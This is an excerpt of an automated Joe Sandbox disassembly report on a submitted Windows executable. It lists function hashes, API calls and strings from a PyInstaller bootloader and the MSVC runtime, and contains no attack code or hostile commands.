                                                                                                    • API String ID: 2943138195-0
                                                                                                    • Opcode ID: 28d39e64d2900046752fe00e0d170ae61e4b908a297697eb59c3c366de5be272
                                                                                                    • Instruction ID: e01e4476c5e825f3442993bf085f1a7e018441999e41eb8f17180454eea1f972
                                                                                                    • Opcode Fuzzy Hash: 28d39e64d2900046752fe00e0d170ae61e4b908a297697eb59c3c366de5be272
                                                                                                    • Instruction Fuzzy Hash: 51618A62F04B529CFB00DBA2D8801EC27B1BB107A8F404476DE6D3BAA9DF78D545C344
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.1718792288.00007FF7691A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7691A0000, based on PE: true
                                                                                                    • Associated: 00000001.00000002.1718771841.00007FF7691A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000001.00000002.1718819453.00007FF7691CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000001.00000002.1718843961.00007FF7691DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000001.00000002.1718843961.00007FF7691E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000001.00000002.1718881280.00007FF7691E6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_1_2_7ff7691a0000_VaTlw2kNGc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _invalid_parameter_noinfo
                                                                                                    • String ID: -$:$f$p$p
                                                                                                    • API String ID: 3215553584-2013873522
                                                                                                    • Opcode ID: 6485ef080591767760fe67f9caec812fff4e1ba5c20858478bd9f0fbec74de2f
                                                                                                    • Instruction ID: 5e1f2c9175aad29784a9285a4fbde8ee966cf1edc5fe99522353df13bd9068bd
                                                                                                    • Opcode Fuzzy Hash: 6485ef080591767760fe67f9caec812fff4e1ba5c20858478bd9f0fbec74de2f
                                                                                                    • Instruction Fuzzy Hash: 34128162A08243C6FB68BF15F154279F673FB40754FE44136D69A866CCDB3CE9908B24
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.1718792288.00007FF7691A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7691A0000, based on PE: true
                                                                                                    • Associated: 00000001.00000002.1718771841.00007FF7691A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000001.00000002.1718819453.00007FF7691CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000001.00000002.1718843961.00007FF7691DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000001.00000002.1718843961.00007FF7691E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000001.00000002.1718881280.00007FF7691E6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_1_2_7ff7691a0000_VaTlw2kNGc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _invalid_parameter_noinfo
                                                                                                    • String ID: f$f$p$p$f
                                                                                                    • API String ID: 3215553584-1325933183
                                                                                                    • Opcode ID: 47a7a6303f50c331757a7ed503f6ccc132970c05c2223996d06c8e5714df85c4
                                                                                                    • Instruction ID: f19603c7e64af85dfceb716c266e3bccffdf2a7e8516f712b8c0d46b6fa7cf23
                                                                                                    • Opcode Fuzzy Hash: 47a7a6303f50c331757a7ed503f6ccc132970c05c2223996d06c8e5714df85c4
                                                                                                    • Instruction Fuzzy Hash: EB125062E0D143C6FB28BE15B254779E6B3FB80754FE84036D699466CCDB7CE9808B60
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.1718925987.00007FFE13301000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFE13300000, based on PE: true
                                                                                                    • Associated: 00000001.00000002.1718901593.00007FFE13300000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                    • Associated: 00000001.00000002.1718946641.00007FFE13311000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                    • Associated: 00000001.00000002.1718966930.00007FFE13316000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                    • Associated: 00000001.00000002.1718983953.00007FFE13317000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_1_2_7ffe13300000_VaTlw2kNGc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: abortterminate$Is_bad_exception_allowedstd::bad_alloc::bad_alloc
                                                                                                    • String ID: csm$csm$csm
                                                                                                    • API String ID: 211107550-393685449
                                                                                                    • Opcode ID: 1f2c6e9c8ad6c1917ecaa8d6efe9c468c91fc9baef10e6d9588306a72b9f3ebc
                                                                                                    • Instruction ID: 5b4014f580c43b88c61bdcf58b40691fa99d85ee5380e304aa17ceaa4bb1543a
                                                                                                    • Opcode Fuzzy Hash: 1f2c6e9c8ad6c1917ecaa8d6efe9c468c91fc9baef10e6d9588306a72b9f3ebc
                                                                                                    • Instruction Fuzzy Hash: 20E1C372A08A818EE750DF7AD4803AE77A0FB64B78F140175DAAD67765CF38E085C704
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.1718925987.00007FFE13301000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFE13300000, based on PE: true
                                                                                                    • Associated: 00000001.00000002.1718901593.00007FFE13300000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                    • Associated: 00000001.00000002.1718946641.00007FFE13311000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                    • Associated: 00000001.00000002.1718966930.00007FFE13316000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                    • Associated: 00000001.00000002.1718983953.00007FFE13317000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_1_2_7ffe13300000_VaTlw2kNGc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Name::operator+
                                                                                                    • String ID: cli::array<$cli::pin_ptr<$std::nullptr_t$std::nullptr_t $void$void
                                                                                                    • API String ID: 2943138195-2239912363
                                                                                                    • Opcode ID: e2dcc5ac231621b7bb9adceaede0f9dd180f9bba2b8fff5e7c5622460418e45f
                                                                                                    • Instruction ID: ecff60bcfbdd1f009dca05d3a01a3681d4c46eb00fc70ca211c09ee6bece37f6
                                                                                                    • Opcode Fuzzy Hash: e2dcc5ac231621b7bb9adceaede0f9dd180f9bba2b8fff5e7c5622460418e45f
                                                                                                    • Instruction Fuzzy Hash: BC514972E18F458CFB198FA2E8412BC77B0BB28764F4441B5DA6D22AA5DF7C9144C718
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.1718792288.00007FF7691A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7691A0000, based on PE: true
                                                                                                    • Associated: 00000001.00000002.1718771841.00007FF7691A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000001.00000002.1718819453.00007FF7691CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000001.00000002.1718843961.00007FF7691DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000001.00000002.1718843961.00007FF7691E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000001.00000002.1718881280.00007FF7691E6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_1_2_7ff7691a0000_VaTlw2kNGc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Message
                                                                                                    • String ID: Failed to extract %s: failed to allocate data buffer (%u bytes)!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$fread$fseek$malloc
                                                                                                    • API String ID: 2030045667-3659356012
                                                                                                    • Opcode ID: ae84da08143089e60ea32d7eb7b7e7c5018d8cc8e587b31aa60bcf4a1b821e90
                                                                                                    • Instruction ID: dbb8be42ad3c6ab9ee10c9e73587333f48a04fe616b30de97dba3e62b82e7663
                                                                                                    • Opcode Fuzzy Hash: ae84da08143089e60ea32d7eb7b7e7c5018d8cc8e587b31aa60bcf4a1b821e90
                                                                                                    • Instruction Fuzzy Hash: E6415121B08646C2EA28BF22B9405BAE3B1BF54BC4FE44431DD5E47F95DE3CE9058750
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.1718792288.00007FF7691A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7691A0000, based on PE: true
                                                                                                    • Associated: 00000001.00000002.1718771841.00007FF7691A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000001.00000002.1718819453.00007FF7691CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000001.00000002.1718843961.00007FF7691DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000001.00000002.1718843961.00007FF7691E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000001.00000002.1718881280.00007FF7691E6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_1_2_7ff7691a0000_VaTlw2kNGc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Process_invalid_parameter_noinfo$ByteCharCodeCommandConsoleCreateCtrlExitHandlerInfoLineMultiObjectSingleStartupWaitWide
                                                                                                    • String ID: CreateProcessW$Failed to create child process!
                                                                                                    • API String ID: 2895956056-699529898
                                                                                                    • Opcode ID: 2d8580ce5d81a01d0f8683f73fef31206a84e7faf833a053d17f215ed92b6c27
                                                                                                    • Instruction ID: 80f10013f5adadd07f0faabdc45a136860996e77bc39537f9d07cbdcaac1c13e
                                                                                                    • Opcode Fuzzy Hash: 2d8580ce5d81a01d0f8683f73fef31206a84e7faf833a053d17f215ed92b6c27
                                                                                                    • Instruction Fuzzy Hash: 58412032A08781C5DA24AF24F4552AAB3B1FB88364FA40335E6AD47BD9DF7CD445CB50
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.1718792288.00007FF7691A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7691A0000, based on PE: true
                                                                                                    • Associated: 00000001.00000002.1718771841.00007FF7691A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000001.00000002.1718819453.00007FF7691CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000001.00000002.1718843961.00007FF7691DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000001.00000002.1718843961.00007FF7691E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000001.00000002.1718881280.00007FF7691E6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_1_2_7ff7691a0000_VaTlw2kNGc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                                                                    • String ID: csm$csm$csm
                                                                                                    • API String ID: 849930591-393685449
                                                                                                    • Opcode ID: e61afc8d21ba52cdbe611d77afa9c967b031d652e012678c684f0478f5a183c7
                                                                                                    • Instruction ID: 3de6a84cb46d98eb451ca9ec87a3f4b17f2614a0aad2d5357caf8b5cb3872a20
                                                                                                    • Opcode Fuzzy Hash: e61afc8d21ba52cdbe611d77afa9c967b031d652e012678c684f0478f5a183c7
                                                                                                    • Instruction Fuzzy Hash: 01D17F32A08B41CAEB28AF65A5403BDB7B0FB54788FA04136EE4D57B95DF38E941C710
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.1718925987.00007FFE13301000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFE13300000, based on PE: true
                                                                                                    • Associated: 00000001.00000002.1718901593.00007FFE13300000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                    • Associated: 00000001.00000002.1718946641.00007FFE13311000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                    • Associated: 00000001.00000002.1718966930.00007FFE13316000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                    • Associated: 00000001.00000002.1718983953.00007FFE13317000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_1_2_7ffe13300000_VaTlw2kNGc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: FileHeader$ExceptionFindInstanceRaiseTargetType
                                                                                                    • String ID: Access violation - no RTTI data!$Attempted a typeid of nullptr pointer!$Bad dynamic_cast!$Bad read pointer - no RTTI data!
                                                                                                    • API String ID: 1852475696-928371585
                                                                                                    • Opcode ID: 7f6c35cefbfcfc98e88ebc0aa35afe6c2c6ede9eabcdb344d1914a97fbaad475
                                                                                                    • Instruction ID: 2d98b8da232cc3116597f5cefd4a62557a2472c79bfa4be9646a38cfaf8c31a4
                                                                                                    • Opcode Fuzzy Hash: 7f6c35cefbfcfc98e88ebc0aa35afe6c2c6ede9eabcdb344d1914a97fbaad475
                                                                                                    • Instruction Fuzzy Hash: B851B362A0DE46DAEE20CB26E4901BD6360FF64BA4F504571DAAD276BADF3CE505C304
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.1718925987.00007FFE13301000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFE13300000, based on PE: true
                                                                                                    • Associated: 00000001.00000002.1718901593.00007FFE13300000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                    • Associated: 00000001.00000002.1718946641.00007FFE13311000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                    • Associated: 00000001.00000002.1718966930.00007FFE13316000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                    • Associated: 00000001.00000002.1718983953.00007FFE13317000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_1_2_7ffe13300000_VaTlw2kNGc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Name::operator+$Name::operator+=
                                                                                                    • String ID: {for
                                                                                                    • API String ID: 179159573-864106941
                                                                                                    • Opcode ID: edc966f78679f2c80b6a90da374f91d2d358e76260b44eb27b7c84d8a506cb89
                                                                                                    • Instruction ID: 02bc4ae01f6feb34610a84400f8f8328b14b6835919ffc7dfbfe76f607d78339
                                                                                                    • Opcode Fuzzy Hash: edc966f78679f2c80b6a90da374f91d2d358e76260b44eb27b7c84d8a506cb89
                                                                                                    • Instruction Fuzzy Hash: 4E518D72A08E859DE7019F26C4413EC77A4EB24768F4080B1EA6C27BA6DF7CD650C318
                                                                                                    APIs
                                                                                                    • GetTempPathW.KERNEL32(?,?,FFFFFFFF,00007FF7691A3834), ref: 00007FF7691A7CE4
                                                                                                    • CreateDirectoryW.KERNEL32(?,?,FFFFFFFF,00007FF7691A3834), ref: 00007FF7691A7D2C
                                                                                                      • Part of subcall function 00007FF7691A7E10: GetEnvironmentVariableW.KERNEL32(00007FF7691A365F), ref: 00007FF7691A7E47
                                                                                                      • Part of subcall function 00007FF7691A7E10: ExpandEnvironmentStringsW.KERNEL32 ref: 00007FF7691A7E69
                                                                                                      • Part of subcall function 00007FF7691B7548: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7691B7561
                                                                                                      • Part of subcall function 00007FF7691A26C0: MessageBoxW.USER32 ref: 00007FF7691A2736
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.1718792288.00007FF7691A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7691A0000, based on PE: true
                                                                                                    • Associated: 00000001.00000002.1718771841.00007FF7691A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000001.00000002.1718819453.00007FF7691CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000001.00000002.1718843961.00007FF7691DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000001.00000002.1718843961.00007FF7691E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000001.00000002.1718881280.00007FF7691E6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_1_2_7ff7691a0000_VaTlw2kNGc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Environment$CreateDirectoryExpandMessagePathStringsTempVariable_invalid_parameter_noinfo
                                                                                                    • String ID: LOADER: failed to set the TMP environment variable.$LOADER: length of teporary directory path exceeds maximum path length!$TMP$TMP$_MEI%d
                                                                                                    • API String ID: 740614611-1339014028
                                                                                                    • Opcode ID: 41794429c51d27e0df7a21877b4f19c7cdf826b4f928fd21ea6cb85727b80d41
                                                                                                    • Instruction ID: 1f07de73959348c7c154c4174419d6cdd0ac35e422deaef3ae17e57a6a4893d9
                                                                                                    • Opcode Fuzzy Hash: 41794429c51d27e0df7a21877b4f19c7cdf826b4f928fd21ea6cb85727b80d41
                                                                                                    • Instruction Fuzzy Hash: 4C416011F09642C1EA28BF61B9552F9D271AF45B80FE44032ED1E57BDAEE3CEA05C760
                                                                                                    APIs
                                                                                                    • LoadLibraryExW.KERNEL32(?,?,?,00007FFE13306A6B,?,?,00000000,00007FFE1330689C,?,?,?,?,00007FFE133065E5), ref: 00007FFE13306931
                                                                                                    • GetLastError.KERNEL32(?,?,?,00007FFE13306A6B,?,?,00000000,00007FFE1330689C,?,?,?,?,00007FFE133065E5), ref: 00007FFE1330693F
                                                                                                    • wcsncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00007FFE13306A6B,?,?,00000000,00007FFE1330689C,?,?,?,?,00007FFE133065E5), ref: 00007FFE13306958
                                                                                                    • LoadLibraryExW.KERNEL32(?,?,?,00007FFE13306A6B,?,?,00000000,00007FFE1330689C,?,?,?,?,00007FFE133065E5), ref: 00007FFE1330696A
                                                                                                    • FreeLibrary.KERNEL32(?,?,?,00007FFE13306A6B,?,?,00000000,00007FFE1330689C,?,?,?,?,00007FFE133065E5), ref: 00007FFE133069B0
                                                                                                    • GetProcAddress.KERNEL32(?,?,?,00007FFE13306A6B,?,?,00000000,00007FFE1330689C,?,?,?,?,00007FFE133065E5), ref: 00007FFE133069BC
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.1718925987.00007FFE13301000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFE13300000, based on PE: true
                                                                                                    • Associated: 00000001.00000002.1718901593.00007FFE13300000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                    • Associated: 00000001.00000002.1718946641.00007FFE13311000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                    • Associated: 00000001.00000002.1718966930.00007FFE13316000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                    • Associated: 00000001.00000002.1718983953.00007FFE13317000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_1_2_7ffe13300000_VaTlw2kNGc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Library$Load$AddressErrorFreeLastProcwcsncmp
                                                                                                    • String ID: api-ms-
                                                                                                    • API String ID: 916704608-2084034818
                                                                                                    • Opcode ID: 45bb9c456b18d615664943834e4003b355ea3ec7f5874fc1f64106649d67ca5c
                                                                                                    • Instruction ID: b7aae946a8d91d241258989ff18183624e8fbc637ecef721bb62c4943a7a1a7f
                                                                                                    • Opcode Fuzzy Hash: 45bb9c456b18d615664943834e4003b355ea3ec7f5874fc1f64106649d67ca5c
                                                                                                    • Instruction Fuzzy Hash: 0231C421B1AE4299EE11DB0799002B9A394FF64BB0F294575DD7D2B7A9EF3CE144C308
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.1718925987.00007FFE13301000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFE13300000, based on PE: true
                                                                                                    • Associated: 00000001.00000002.1718901593.00007FFE13300000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                    • Associated: 00000001.00000002.1718946641.00007FFE13311000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                    • Associated: 00000001.00000002.1718966930.00007FFE13316000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                    • Associated: 00000001.00000002.1718983953.00007FFE13317000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_1_2_7ffe13300000_VaTlw2kNGc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: abort$AdjustPointer
                                                                                                    • String ID:
                                                                                                    • API String ID: 1501936508-0
                                                                                                    • Opcode ID: d386002f74db6febb42ef9b4bac4e43e25a554ab645870d9c47f674d5a84533b
                                                                                                    • Instruction ID: d500719622b797de94648a33a44b72416860f68811ac72ad3da824d0d9412dea
                                                                                                    • Opcode Fuzzy Hash: d386002f74db6febb42ef9b4bac4e43e25a554ab645870d9c47f674d5a84533b
                                                                                                    • Instruction Fuzzy Hash: B351D321E09E4689EAA6CB13D04463C63A4AF74FB0F0540B5EE6DA67B6DF6CE441C308
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.1718925987.00007FFE13301000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFE13300000, based on PE: true
                                                                                                    • Associated: 00000001.00000002.1718901593.00007FFE13300000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                    • Associated: 00000001.00000002.1718946641.00007FFE13311000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                    • Associated: 00000001.00000002.1718966930.00007FFE13316000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                    • Associated: 00000001.00000002.1718983953.00007FFE13317000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_1_2_7ffe13300000_VaTlw2kNGc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: abort$AdjustPointer
                                                                                                    • String ID:
                                                                                                    • API String ID: 1501936508-0
                                                                                                    • Opcode ID: ad7bbbe6b4c289a22ae1e43e79ef4439cf3ee9b14764b2eff01f06dd25f3f236
                                                                                                    • Instruction ID: b32aa8f634e8eeee5686d8ca7137b57ea6fb95e40eb4694476f06213cda9143e
                                                                                                    • Opcode Fuzzy Hash: ad7bbbe6b4c289a22ae1e43e79ef4439cf3ee9b14764b2eff01f06dd25f3f236
                                                                                                    • Instruction Fuzzy Hash: A951D721E09E4389FAA5CB57948463CA394EF74FB1F0944B5CEADA67B5DF2CE4418308
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.1718925987.00007FFE13301000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFE13300000, based on PE: true
                                                                                                    • Associated: 00000001.00000002.1718901593.00007FFE13300000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                    • Associated: 00000001.00000002.1718946641.00007FFE13311000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                    • Associated: 00000001.00000002.1718966930.00007FFE13316000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                    • Associated: 00000001.00000002.1718983953.00007FFE13317000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_1_2_7ffe13300000_VaTlw2kNGc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: FileHeader_local_unwind
                                                                                                    • String ID: MOC$RCC$csm$csm
                                                                                                    • API String ID: 2627209546-1441736206
                                                                                                    • Opcode ID: 385ada566cdd30ad99b7ac5e1d5c8025a7264eea7c22efa234297d7bd0e399d8
                                                                                                    • Instruction ID: ee08a0d92f4298641f4ed53d2ae382b87543e4a7517ba80243e9bf94bfaf9f7c
                                                                                                    • Opcode Fuzzy Hash: 385ada566cdd30ad99b7ac5e1d5c8025a7264eea7c22efa234297d7bd0e399d8
                                                                                                    • Instruction Fuzzy Hash: F8517172E0DA168EFB609F26900137D76A0FF64BA4F141071EA6D663A5DF3CE4818B05
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.1718925987.00007FFE13301000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFE13300000, based on PE: true
                                                                                                    • Associated: 00000001.00000002.1718901593.00007FFE13300000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                    • Associated: 00000001.00000002.1718946641.00007FFE13311000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                    • Associated: 00000001.00000002.1718966930.00007FFE13316000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                    • Associated: 00000001.00000002.1718983953.00007FFE13317000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_1_2_7ffe13300000_VaTlw2kNGc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: NameName::atol
                                                                                                    • String ID: `template-parameter$void
                                                                                                    • API String ID: 2130343216-4057429177
                                                                                                    • Opcode ID: 2821a58495c29764098872c6b010649cccddcb6c42941e500fb92a9452cac6b1
                                                                                                    • Instruction ID: 76a62267eba4e3c23af488a9991f97291b3bf2fd9791966979e339055da59c44
                                                                                                    • Opcode Fuzzy Hash: 2821a58495c29764098872c6b010649cccddcb6c42941e500fb92a9452cac6b1
                                                                                                    • Instruction Fuzzy Hash: 0A413522F08F56CCFB009BA6D8552BC23B1BB28BA8F541175DE2D26A79DF38A505C344
                                                                                                    APIs
                                                                                                    • LoadLibraryExW.KERNEL32(?,?,?,00007FF7691AD29A,?,?,?,00007FF7691ACF8C,?,?,?,00007FF7691ACB89), ref: 00007FF7691AD06D
                                                                                                    • GetLastError.KERNEL32(?,?,?,00007FF7691AD29A,?,?,?,00007FF7691ACF8C,?,?,?,00007FF7691ACB89), ref: 00007FF7691AD07B
                                                                                                    • LoadLibraryExW.KERNEL32(?,?,?,00007FF7691AD29A,?,?,?,00007FF7691ACF8C,?,?,?,00007FF7691ACB89), ref: 00007FF7691AD0A5
                                                                                                    • FreeLibrary.KERNEL32(?,?,?,00007FF7691AD29A,?,?,?,00007FF7691ACF8C,?,?,?,00007FF7691ACB89), ref: 00007FF7691AD113
                                                                                                    • GetProcAddress.KERNEL32(?,?,?,00007FF7691AD29A,?,?,?,00007FF7691ACF8C,?,?,?,00007FF7691ACB89), ref: 00007FF7691AD11F
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.1718792288.00007FF7691A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7691A0000, based on PE: true
                                                                                                    • Associated: 00000001.00000002.1718771841.00007FF7691A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000001.00000002.1718819453.00007FF7691CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000001.00000002.1718843961.00007FF7691DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000001.00000002.1718843961.00007FF7691E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000001.00000002.1718881280.00007FF7691E6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_1_2_7ff7691a0000_VaTlw2kNGc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Library$Load$AddressErrorFreeLastProc
                                                                                                    • String ID: api-ms-
                                                                                                    • API String ID: 2559590344-2084034818
                                                                                                    • Opcode ID: ae36e00ef30d4e956021163d7a0c1bae911f6c658fcf96311cd3d9d96979b27c
                                                                                                    • Instruction ID: d8f3b35796722d8ffef25c0141a0ed9c9db71d75a2e66361af65beb86ee0bc11
                                                                                                    • Opcode Fuzzy Hash: ae36e00ef30d4e956021163d7a0c1bae911f6c658fcf96311cd3d9d96979b27c
                                                                                                    • Instruction Fuzzy Hash: 2131A325A1AA42C5EE19AF12B500579A3B4BF09BA0FB90536DD1D47B80EF3CE846C724
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.1718925987.00007FFE13301000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFE13300000, based on PE: true
                                                                                                    • Associated: 00000001.00000002.1718901593.00007FFE13300000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                    • Associated: 00000001.00000002.1718946641.00007FFE13311000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                    • Associated: 00000001.00000002.1718966930.00007FFE13316000.00000004.00000001.01000000.00000005.sdmpDownload File
